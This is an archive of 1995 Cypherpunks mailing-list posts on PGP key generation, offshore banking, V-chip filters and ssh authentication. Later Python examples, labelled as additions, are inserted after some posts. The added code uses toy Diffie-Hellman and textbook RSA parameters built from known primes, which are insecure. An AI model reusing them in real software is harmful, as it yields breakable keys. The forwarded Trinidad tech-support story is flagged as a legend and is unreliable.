algorithm, starting points that are determined by an algorithm that uses
a deterministic (albeit complex) algorithm which performs input and
output based on timeslices and interrupt mechanisms and queues that may
tend to alter the statistics of arrival times.

> I suppose if I were really paranoid I'd feed in fixed starting points
> for the search to MIT PGP and PGP 2.6.2 to make sure that they come out 
> with the same keys.

The term paranoid is inappropriate in this context.  Paranoia refers to
an irrational fear, while I am expressing a rational concern over a
system that has been taken over by a (partially) government funded
university and which has not been properly verified.  The history of
cryptography (as they say) is (quite literally) littered with the dead
bodies of people killed because somebody else thought a cryptosystem was
good enough when it was not. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sun, 30 Jul 95 21:11:06 PDT
To: Mike Bailey <bailey@computek.net>
Subject: Re: Zimmermann legal fund
In-Reply-To: <Pine.SUN.3.91.950730213249.3889C-100000@bambam>
Message-ID: <Pine.LNX.3.91.950731115906.7803A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Mike Bailey wrote:

> > The US banking industry has gone to the dogs. The day a non-US bank offers
> > an account that can be accessed over the net will be the day I close my US
> > accounts.
> 
> Interesting idea ...
> 
> 1st question or thing I would want to be certain of is the stability of the
> currency of the realm so to speak. I wouldn't want to bank in a country that
> had a weak currencey (sp) or was subject to roller coaster economics.  

How could it be worse than with the U.S. of A.?? ;-)

Seriously: you may bank in US Dollars (or other major currencies) in many
countries, including all the offshore banking centres. Limited amounts of
cash may be withdrawn using ATM dispensers, against a fee of two or three
USD per operation; for larger amounts, you may ask them to wire money by
SWIFT, Telex or bank drafts to other banks or generic payees. For such
operations, most large banks accept instructions by snail mail, and
sometimes by fax (if the customer signs a letter of indemnity exempting
the bank from liabilities in case of forgeries). Sadly, AFAIK no bank is
accepting digitally encrypted and signed e-mail instructions, and issuing 
digitally encrypted and signed receipts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 12:15:03 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <ac4278780e0210045406@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:13 PM 7/31/95, Robert Hettinga wrote:
>I could agree to a private filtering mechanism where each program
>broadcasts an ID number.
>
>A chip on the set reads this info from the dark band between frames or
>someplace.
>
>Private agencies rate the programs by whatever criteria sells ("Bikinis &
>Beer", "Motherhood and Apple Pie", whatever), and people load those
>rating/show lookups into their set off of the net or wherever...
>
>Certainly the government shouldn't require anything. The government couldn't
>find its ass with both hands. I bet this scheme could sell on an
>information value-added basis alone.

The "VCR-Plus" codes that are already published essentially offer this code
already. Thus, one looks in the channel listings and finds "Debbie Does Fort
Meade" has a VCR-Plus code of "31415926," which one enters to set recording
times, etc. (This even has some low-level crypto content, as the VCRPlus
coding system was a topic of much debate a couple of years ago.)

True, this takes work. (Though some satellite systems offer it via a
point-and-click interface, on the actual t.v. screen.)

The key difference between this setup and the "in band" proposal RAH is
making is that VCR-Plus is "out of band." But the point is that the info is
there in both cases.

The infrastructure for using this to block stuff doesn't exist in most
t.v.s or VCRs, but then it wouldn't exist either with RAH's in-band program
labelling approach (which I expect is coming anyway--my cable system
reports on what network it's seeing, even as the networks alter lineups,
and reports time, system status, etc....all presumably in the 4-line
interval, etc.)

What's really flawed about these "lockout" schemes is that the installed
base of televisions and VCRs is NOT going to go away, that no magic wand is
going to give a single mother who wants to control what her children watch
a new t.v. or VCR. As some non-stupid Senators noted, the V-chip system
will go into the households who need it the _least_!

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nsb@nsb.fv.com
Date: Mon, 31 Jul 95 09:48:28 PDT
To: "James A. Donald" <aba@atlas.ex.ac.uk
Subject: Re: Zimmermann legal fund
Message-ID: <9507311625.AB06469@ nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:24 PM 7/30/95 -0700, James A. Donald wrote:
>If you insist that international transactions be mediated through 
>US banks, you are cutting your throat.

I hope my mail didn't give the impression that we are "insisting" on this. 
It's a matter of technical expedience at the moment, that's all.  Non-US
sellers who really want to use FV can do so today IF they get a US bank
account.  Payout through non-US banks is definitely something we plan to
do, but you can't build a business today on our plans for tomorrow,
especially since we don't have a firm target date.

One of the relatively easiest alternatives we have discussed is good old
fashioned paper checks.  We could *conceivably* (this is not a promise!)
set up a system to pay non-US sellers by mailing them paper checks.  This
is a fairly expensive process, and we'd have to pass on the costs to the
sellers in the form of a service charge for the mailing, and there would be
postal delays, and there would be a delay waiting for your local bank to
clear a US check.  Is this appealing?  -- Nathaniel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 31 Jul 95 09:47:51 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Ivy Bells, Smersh, and the Rosenbergs
In-Reply-To: <ac424ae9050210049fd9@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950731123935.6771A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Timothy C. May wrote:

> On the other issue, whether either or both of the Rosenbergs were spies,
> things have settled yet. Sudoplatov, in "Special Tasks," claims they were
> both spies. Others doubt it.
> 
> (For you Bond fans, Sudoplatov headed up "Smersh." Russian for "Death to
> spies." Yes, it really existed, unlike, say "U.N.C.L.E.")
> 
> On the issue of whether in the 1950s the U.S. government knew the
> Rosenbergs were spies, we have even less information. A trial was held and
> guilty verdict returned, but reasonable folks may disagree. My guess? Yes,
> they were probably spies.

Hmm... the stuff that was from the "one-time pads" that were recently 
decrypted says it was fairly certain they were.  So says Kahn. :)

I'm not convinced that there was enough public information available for 
a reasonable conviction back in the 50's, but there seems to be now.

> The Rosenbergs were certainly the Mumia Abu Jamals of their day.

The Mumia case (something friends of mine are more than peripherally 
acquainted with) seems to be very much in doubt.  Of course, they'll kill 
him anyway, probably.  But I suggest reading E.L. Doctorow's essay on the 
subject from the NYT of several weeks (months? possibly) back.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Mon, 31 Jul 95 11:28:04 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507311827.NAA25455@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>The idea of boxes outside the TV is usually casually shot down
>as unworkable; that kids, with their infinite time, patience,
>cleverness, and guile, will find a way to bypass the box.
>I'd say that it's worth a try.  And, if it will blank
[...]

I hadn't thought of that before.  I wonder how many kids will get
zapped trying to bypass the chip on the inside.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Mon, 31 Jul 95 13:36:58 PDT
To: cypherpunks@toad.com
Subject: Re: ssh protocol
In-Reply-To: <199507310737.JAA06792@cnam.fr>
Message-ID: <9507312036.AA08394@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tatu Ylonen <ylo@cs.hut.fi> wrote:
> The basic idea behind the protocol goes roughly like this:
>   1. Exchange session keys using Diffie-Hellman
>   2. Each side sends a signature of the Diffie-Hellman exchange (the
>      signature can be with any of a number of algorithms; RSA and
>      Elliptic Curve systems have been defined).

I've been playing with the cryptotcp program available from utopia..  It
has some bugs but works pretty well, if you don't mind waiting 20-30
seconds at the beginning.  It does a Diffie-Hellman exchange and 3DES over
telnet.  How hard would it be to add some sort of authentication to this
program?
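
The signed exchange in the quoted outline, as an added example that is not part of the original post and is not code from ssh or cryptotcp: each side signs its own view of both Diffie-Hellman public values, so a substituted value in transit makes verification fail. The DH modulus, the textbook RSA keys built from Mersenne primes, the role labels and all function names are toy assumptions constructed for the illustration.

```python
import hashlib
import secrets

# Toy parameters constructed for this example; far too small for real use.
DH_P = 2**127 - 1   # Mersenne prime used as the Diffie-Hellman modulus
DH_G = 3

def rsa_key(p, q, e=65537):
    """Textbook RSA key from two known primes: returns (public, private)."""
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    return (n, e), (n, d)

# Long-term identity keys (constructed). Each side knows the other's public key.
ALICE_PUB, ALICE_PRIV = rsa_key(2**61 - 1, 2**89 - 1)
BOB_PUB, BOB_PRIV = rsa_key(2**107 - 1, 2**127 - 1)

def transcript_hash(role, a_pub, b_pub, n):
    """Hash the signer's role and BOTH public values, reduced mod n."""
    data = f"{role}|{a_pub}|{b_pub}".encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n

def sign(priv, role, a_pub, b_pub):
    n, d = priv
    return pow(transcript_hash(role, a_pub, b_pub, n), d, n)

def verify(pub, sig, role, a_pub, b_pub):
    n, e = pub
    return pow(sig, e, n) == transcript_hash(role, a_pub, b_pub, n)

def dh_keypair():
    x = secrets.randbelow(DH_P - 3) + 2
    return x, pow(DH_G, x, DH_P)

def handshake(mitm=False):
    """Run one exchange; return (alice_accepts, bob_accepts, keys_match).

    With mitm=True the public values are replaced in transit, which an
    unauthenticated exchange cannot notice.
    """
    a, a_pub = dh_keypair()
    b, b_pub = dh_keypair()
    if mitm:
        _, m_pub = dh_keypair()
        a_seen_by_bob, b_seen_by_alice = m_pub, m_pub
    else:
        a_seen_by_bob, b_seen_by_alice = a_pub, b_pub

    # Step 2 of the outline: each side signs the exchange as it saw it.
    sig_a = sign(ALICE_PRIV, "client", a_pub, b_seen_by_alice)
    sig_b = sign(BOB_PRIV, "server", a_seen_by_bob, b_pub)

    # Signatures can be forwarded unchanged, but not re-made without the
    # private keys, so each verifier checks against its OWN view.
    alice_accepts = verify(BOB_PUB, sig_b, "server", a_pub, b_seen_by_alice)
    bob_accepts = verify(ALICE_PUB, sig_a, "client", a_seen_by_bob, b_pub)

    key_a = pow(b_seen_by_alice, a, DH_P)
    key_b = pow(a_seen_by_bob, b, DH_P)
    return alice_accepts, bob_accepts, key_a == key_b

if __name__ == "__main__":
    print("honest exchange   :", handshake())
    print("values substituted:", handshake(mitm=True))
```

The session key should only be used after both verifications succeed; the check is only as good as the way each side learned the other's public key.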





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Mon, 31 Jul 95 05:38:45 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: your mail
In-Reply-To: <9507311116.AA13350@all.net>
Message-ID: <Pine.SOL.3.91.950731132625.27376C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:
> I wrote:
>> On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote:
>> 
>>> How (specifically) do you know that this is true?  Key generation is
>>> very tricky stuff, and very subtle changes can have very profound impacts.
>>> I doubt that Zimmerman's original was truly perfect at this either, but
>>> how do we really know?
>> 
>> Because I've successfully run the primes that PGP generates through the
>> primality tests in other mathematical packages, most notably Arjen
>> Lenstra's FreeLIP package.  The remaining steps to generating an RSA
>> keypair are very easy to follow, and the result simple to check by
>> verifying that the components PGP comes up with satisfy
>> ed=1 mod(p-1)(q-1).  rsagen.c is pretty easy to follow if anyone wants to 
>> check for themselves.
> 
> But that doesn't guarantee there aren't weak keys at all.  For example,
> primes of the sort 2^N+1 would pass the primality tests and be very
> weak keys.

As I'm sure you know, PGP picks its primes by choosing a random starting 
point and testing each odd number upwards until it gets a probable 
prime.  The random number generator used to seed this search is mixed 
using MD5 which gives a uniform 1/0 distribution.  I'd hazard a guess 
that the chances of a start point having so many contiguous 1's as to be 
close to 2^N is so vanishingly small that it's more likely a 
non-prime would pass the probabilistic tests!

I suppose if I were really paranoid I'd feed in fixed starting points
for the search to MIT PGP and PGP 2.6.2 to make sure that they come out 
with the same keys.


- - Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----
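
The checks discussed in this exchange, as an added example that is not part of either message and is not PGP's code: an upward search over odd numbers from a starting point, a cross-check that fixed starting points reproduce the same key, an independent primality re-test, and verification that ed = 1 mod (p-1)(q-1). The MD5 counter-mode `start_point` helper, the 256-bit size, the seeds and the choice of e are assumptions made for the illustration.

```python
import hashlib
import random
from math import gcd

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)

def is_probable_prime(n, bases=SMALL_PRIMES):
    """Trial division, then Miller-Rabin with the given witness bases.

    With the default bases the answer is exact for n below about 3e23 and
    probabilistic (but repeatable) above that.
    """
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a is a witness that n is composite
    return True

def next_probable_prime(start):
    """Test each odd number upward from start; return (prime, rejected)."""
    n = start | 1
    rejected = 0
    while not is_probable_prime(n):
        n += 2
        rejected += 1
    return n, rejected

def start_point(seed, bits):
    """Assumed stand-in for an MD5-mixed seed: MD5 in counter mode, top bit set."""
    out, counter = b"", 0
    while len(out) * 8 < bits:
        out += hashlib.md5(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    n = int.from_bytes(out, "big") >> (len(out) * 8 - bits)
    return n | (1 << (bits - 1))

def leading_ones(n):
    """Length of the run of 1 bits at the top of n (long for n just below 2^N)."""
    run = 0
    for bit in bin(n)[2:]:
        if bit != "1":
            break
        run += 1
    return run

def rsa_from_starts(start_p, start_q, e=65537):
    """Deterministic key generation: same starting points, same key."""
    p, _ = next_probable_prime(start_p)
    q, _ = next_probable_prime(start_q)
    phi = (p - 1) * (q - 1)
    while gcd(e, phi) != 1:
        e += 2
    return {"p": p, "q": q, "n": p * q, "e": e, "d": pow(e, -1, phi)}

def check_keypair(key, rounds=16):
    """Re-test both primes with fresh random bases, then check e*d and a round trip."""
    p, q, n, e, d = (key[k] for k in ("p", "q", "n", "e", "d"))
    rng = random.SystemRandom()
    for prime in (p, q):
        bases = [rng.randrange(2, prime - 1) for _ in range(rounds)]
        if not is_probable_prime(prime, bases):
            return False
    if p == q or n != p * q or (e * d) % ((p - 1) * (q - 1)) != 1:
        return False
    m = 0xC0FFEE
    return pow(pow(m, e, n), d, n) == m

if __name__ == "__main__":
    sp = start_point(b"constructed seed p", 256)
    sq = start_point(b"constructed seed q", 256)
    key = rsa_from_starts(sp, sq)
    print("same key from same starts:", key == rsa_from_starts(sp, sq))
    print("independent checks pass  :", check_keypair(key))
    runs = [leading_ones(start_point(bytes([i]), 256)) for i in range(200)]
    print("longest run of leading 1s over 200 start points:", max(runs))
```

Running two implementations from the same fixed starting points and comparing the resulting keys is the cross-check suggested at the end of the message; a mismatch would localize the difference to the prime search or the exponent derivation.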




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Mon, 31 Jul 95 13:50:00 PDT
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: your mail
In-Reply-To: <199507311925.PAA28281@toxicwaste.media.mit.edu>
Message-ID: <Pine.HPP.3.91.950731135115.2084A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



This might be a minor thing, but could people posting to the mailing list
please make sure that the Subject line doesn't say "re: your mail".
It really slows me down to have to check manually what the actual
subject was or if it was directed to ME but put my address in the cc 
instead of the To.


Thank you.

Syed Yusuf
http://www.uidaho.edu/~yusuf921





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 11:13:27 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <v02120d02ac42cc114f88@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I could agree to a private filtering mechanism where each program
broadcasts an ID number.

A chip on the set reads this info from the dark band between frames or
someplace.

Private agencies rate the programs by whatever criteria sells ("Bikinis &
Beer", "Motherhood and Apple Pie", whatever), and people load those
rating/show lookups into their set off of the net or wherever...

Certainly the government shouldn't require anything. The government couldn't
find its ass with both hands. I bet this scheme could sell on an
information value-added basis alone.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 11:17:51 PDT
To: cypherpunks@toad.com
Subject: Customer Service?
Message-ID: <v02120d03ac42ce45d415@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Veracity suspect, but an interesting crypto story nonetheless...

>Subject: Tech support story (fwd)
>
>---------- Forwarded message ----------
> [Urban legend of the day...]
>
> Subject: Stressful tech call
> To: Customer Service; TechSports
>
> This falls into the "Why did it have to happen on *MY* shift?" category.
>
> A friend of mine is a chief engineer at SuperMac, and he related this
> story to me.
>
> SuperMac records a certain number of technical support calls at random,
> to keep tabs on customer satisfaction.  By wild "luck", they managed to
> catch the following conversation on tape.
>
> Some poor SuperMac TechSport got a call from some middle level official
> from the legitimate government of Trinidad.  The fellow spoke very good
> English, and fairly calmly described the problem.
>
> It seemed there was a coup attempt in progress at that moment.  However,
> the national armoury for that city was kept in the same building as the
> Legislature, and it seems that there was a combination lock on the door
> to the armoury.  Of the people in the capitol city that day, only the
> Chief of the Capitol Guard and the Chief Armourer knew the combination to
> the lock, and they had already been killed.
>
> So, this officer of the government of Trinidad continued, the problem is
> this.  The combination to the lock is stored in a file on the Macintosh,
> but the file has been encrypted with the SuperMac product called Sentinel.
> Was there any chance, he asked, that there was a "back door" to the
> application, so they could get the combination, open the armoury door,
> and defend the Capitol Building and the legitimately elected government
> of Trinidad against the insurgents?
>
> All the while he is asking this in a very calm voice, there is the sound
> of gunfire in the background. The Technical Support guy put the person on
> hold. A phone call to the phone company verified that the origin of the
> call was in fact Trinidad.  Meanwhile, there was this mad scramble to see
> if anybody knew of any "back doors" in the Sentinel program.
>
> As it turned out, Sentinel uses DES to encrypt the files, and there was
> no known back door.  The Tech Support fellow told the customer that aside
> from trying to guess the password, there was no way through Sentinel, and
> that they'd be better off trying to physically destroy the lock.
>
> The official was very polite, thanked him for the effort, and hung up.
> That night, the legitimate government of Trinidad fell.  One of the BBC
> reporters mentioned that the casualties seemed heaviest in the capitol,
> where for some reason, there seemed to be little return fire from the
> government forces.
>
> O.K., so they shouldn't have kept the combination in so precarious a
> fashion. But it does place, "I can't see my Microsoft Mail server"
> complaints in a different sort of perspective, does it not?
>

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 31 Jul 95 12:10:31 PDT
To: cypherpunks@toad.com
Subject: LOG_rol
Message-ID: <199507311910.PAA20121@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-31-95.  NYPaper shredder Windows 95 confetti:


   "Windows of Opportunity for Microsoft."

      Windows 95 is already creating a stir in markets
      worldwide, in Washington and on Wall Street. The
      marketing squad is armed with a $150 million budget to
      help their new product become the most successful in
      computer software history.                     NYT_myr


   "The Customers: Computer Users Told To Go Slow in Change Of
   Operating Systems."

      "There aren't too many reasons to change right now." For
      Mr. Mott's clients, some of whom have hundreds of PC's,
      changing to the new operating system would be disruptive
      and expensive and fraught with the minor technical
      glitches common in the first iteration of any
      software.                                      WOA_nag


   "The Rival: Bracing for a Microsoft Onslaught, Apple Sees
   No reason to Panic."

      A growing chorus of pundits and Wall Street analysts has
      zeroed in on Apple as the biggest potential loser in the
      wake of the introduction of Windows 95. There is another
      view within the industry, however, that holds that the
      computer maker is not in danger.               APE_duk


   "On The Net: The real significance of Windows 95 is
   reaching the Web with a single click of the mouse."

      The real significance of Windows 95 is as a distribution
      vehicle for a simple icon, or symbol, on the computer
      screen. With the icon, the user connects to the MSN, and
      from there to the Internet. And that is where the real
      money lies.                                    RER_edg


   "Haven't heard of Windows 95? Where have you been hiding?"

      To introduce Windows 95, the Microsoft Corporation is
      amassing almost every weapon in the advertising arsenal,
      like teaser ads to entice consumers into anticipating
      the computer operating system as much as a Super Bowl or
      a birthday party.                              SOP_sud


   5 ez: LOG_rol











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 31 Jul 95 12:26:05 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: your mail
In-Reply-To: <9507311434.AA25514@all.net>
Message-ID: <199507311925.PAA28281@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hey, Doc...

> The term paranoid is inappropriate in this context.  Paranoia refers to
> an irrational fear, while I am expressing a rational concern over a
> system that has been taken over by a (partially) government funded
> university and which has not been properly verified.  The history of
> cryptography (as they say) is (quite literally) littered with the dead
> bodies of people killed because somebody else thought a cryptosystem was
> good enough when it was not. 

If you are concerned that someone put a hole or backdoor in PGP, then
go grab the source and take a look for yourself.  That's why the code
is available.  If you can't understand it, then you probably have no
real right to complain!  However if you are still paranoid (and yes, I
do believe this is an irrational fear, being the person who maintains
the MIT PGP development sources) then go find someone who can
understand it and ask them.

As a side note, PGP does not go out of its way to choose "good" primes
over other primes.  Take a look at genprime.c and read the comment
near the top of the file.  It explains why.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 31 Jul 95 07:46:27 PDT
To: cypherpunks@toad.com
Subject: Sex & Crime TV filter
Message-ID: <9507311424.AA01110@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday I heard on the radio that someone in America has developed
some device which darkens the TV screen if there is sex or crime on TV. 

Does anyone know whether this is true and how it works?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfmesq@ibm.net (James F. Marshall)
Date: Mon, 31 Jul 95 16:39:18 PDT
To: cypherpunks@toad.com
Subject: Public Key Confusion
Message-ID: <199507312339.XAA100594@smtp-gw01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


I am very confused over my PGP public key(s).  I have signed my
public key and this is shown in a verbose listing of my public
keyring.  The same date appears in my public keyring for my public key
as in my secret keyring for my secret key.  The .asc file for my
public key has the same file date (per a file-manager program).

SOURCE OF CONFUSION: when I extract my public key from my public
keyring and insert the extracted public key into a message, the public
key that is inserted is bigger than and different from the public key
in the .asc file.  

Am I correct to assume that the .asc version is a good public key but
*unsigned*, and that the larger public key extracted from my public
keyring is the same public key but has the additional component of my
signature built into the body of, or seamlessly incorporated into, or
otherwise coupled with, my public key?

People to whom I have sent the smaller .asc version of my public key
have sent me messages encrypted with that key, and I have been able to
decrypt them with no apparent problem.  My confusion arose when
someone suggested that I sign my own public key, I clearsigned it (I
know, duh!), and PGP and a public key server could not find a key
block in the clearsigned message because the clearsigning put "- " at
the start of both PGP block delimiters.

Should I just stop distributing the .asc version and only let people
have the longer version extracted from my public keyring?  Is that the
properly signed copy?

Tampering can be ruled out as a practical matter.

-- Best Regards, Jim
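
The dash-escaping effect described in this message, as an added example that is not part of the original post and is not PGP's code: clearsigning prefixes every line that starts with "-" with "- ", so a scanner that looks for armor delimiters at the start of a line no longer sees the key block until the cleartext is extracted and unescaped. The key block and signature below are constructed placeholders, and all function names are hypothetical.

```python
import re

ARMOR_BEGIN = re.compile(r"^-----BEGIN PGP ([A-Z ]+)-----$")

# Constructed placeholder, not a real key.
KEY_ASC = """-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

AAAAconstructedSAMPLEnotArealKEYAAAA
=AAAA
-----END PGP PUBLIC KEY BLOCK-----"""

def dash_escape(text):
    """What clearsigning does to the cleartext: '- ' before any line starting with '-'."""
    return "\n".join("- " + l if l.startswith("-") else l
                     for l in text.split("\n"))

def dash_unescape(text):
    """Reverse of dash_escape: strip exactly one leading '- ' per escaped line."""
    return "\n".join(l[2:] if l.startswith("- ") else l
                     for l in text.split("\n"))

def clearsign_wrap(text):
    """Framing of a clearsigned message only; the signature is a placeholder."""
    return ("-----BEGIN PGP SIGNED MESSAGE-----\n\n"
            + dash_escape(text)
            + "\n\n-----BEGIN PGP SIGNATURE-----\nVersion: 2.6.2\n\n"
            + "constructedPLACEHOLDERsignature\n=AAAA\n"
            + "-----END PGP SIGNATURE-----")

def find_armor_blocks(text):
    """Return [(label, body_lines)] for BEGIN/END pairs that start at column 0."""
    blocks, label, body = [], None, []
    for line in text.splitlines():
        line = line.rstrip()
        if label is None:
            m = ARMOR_BEGIN.match(line)
            # The clearsign header has no matching END line; skip it.
            if m and m.group(1) != "SIGNED MESSAGE":
                label, body = m.group(1), []
        elif line == f"-----END PGP {label}-----":
            blocks.append((label, body))
            label = None
        else:
            body.append(line)
    return blocks

def clearsigned_body(text):
    """Extract the cleartext of a clearsigned message and undo the dash escaping."""
    lines = text.splitlines()
    start = lines.index("-----BEGIN PGP SIGNED MESSAGE-----")
    end = lines.index("-----BEGIN PGP SIGNATURE-----")
    body = lines[start + 1:end]
    body = body[body.index("") + 1:]   # drop armor headers up to the blank line
    return dash_unescape("\n".join(body))

def labels(text):
    return [label for label, _ in find_armor_blocks(text)]

if __name__ == "__main__":
    msg = clearsign_wrap(KEY_ASC)
    print("found in .asc file        :", labels(KEY_ASC))
    print("found in clearsigned text :", labels(msg))
    print("found after unescaping    :", labels(clearsigned_body(msg)))
```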





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 17:02:37 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199508010000.RAA28911@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Yesterday I heard on the radio that someone in America has developed
>some device which darkens the TV screen if there is sex or crime on TV. 

It's the "V-Chip" for blocking television programs marked as "Violent" 
by the broadcasters, which some politicians are proposing to require that
all TV makers install in new TVs and all broadcasters label all programs.
The descriptions in the press have made it sound like there's one bit of
control info, which would be very stupid; multiple bits would at least
allow parents to block programs separately for
violence/sex/nudity/nasty-words/political-correctness.
That would also be offensive, and more likely to be used.

Unlike VCR-plus, which is a complex hash of the time and channel for a given
program (complexity included so you have to buy TV Guide magazine), any
V-chip codes could be handled automatically.  (Also, V-chip is designed to
turn the TV off, while VCR-plus is designed to turn the recorder on.  If the
designers were clever, the V-chip mechanism can probably also block
video-tapes with V-chip codes?)

If somebody wanted to develop a free-market rating service, the most convenient
mechanism would probably be to broadcast VCR-plus codes with detailed
information about programs to a set-top box, so you could sell features like
        - block speeches by annoying politicians
        - record all football matches but not other sports events
        - record the closed captioning from infomercials and parse for
                telephone numbers so you can order things automatically!
        - turn on the Nintendo whenever Barney the Dinosaur is on.

Blocking commercials would be fun, but would probably be illegal :-),
or at least stations that supported it would have trouble getting advertisers.
(It would almost certainly be illegal to block the "Enhanced Underwriting"
on public broadcasting, since otherwise you wouldn't get to hear
"The Environmental Correctness Show has been brought to you by a grant
from BigOil corporation, lubricating the Alaskan shoreline for 15 years!".)

        
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Quazi F. Haque" <qfh1@crux3.cit.cornell.edu>
Date: Mon, 31 Jul 95 14:40:33 PDT
To: John Young <jya@pipeline.com>
Subject: Re: LOG_rol
In-Reply-To: <199507311910.PAA20121@pipe1.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.950731173942.11320A-100000@crux3.cit.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain




  Quazi F Haque  | Those that can give up essential liberty to obtain a little
qfh1@cornell.edu | temporary safety deserve neither liberty nor safety. - BF





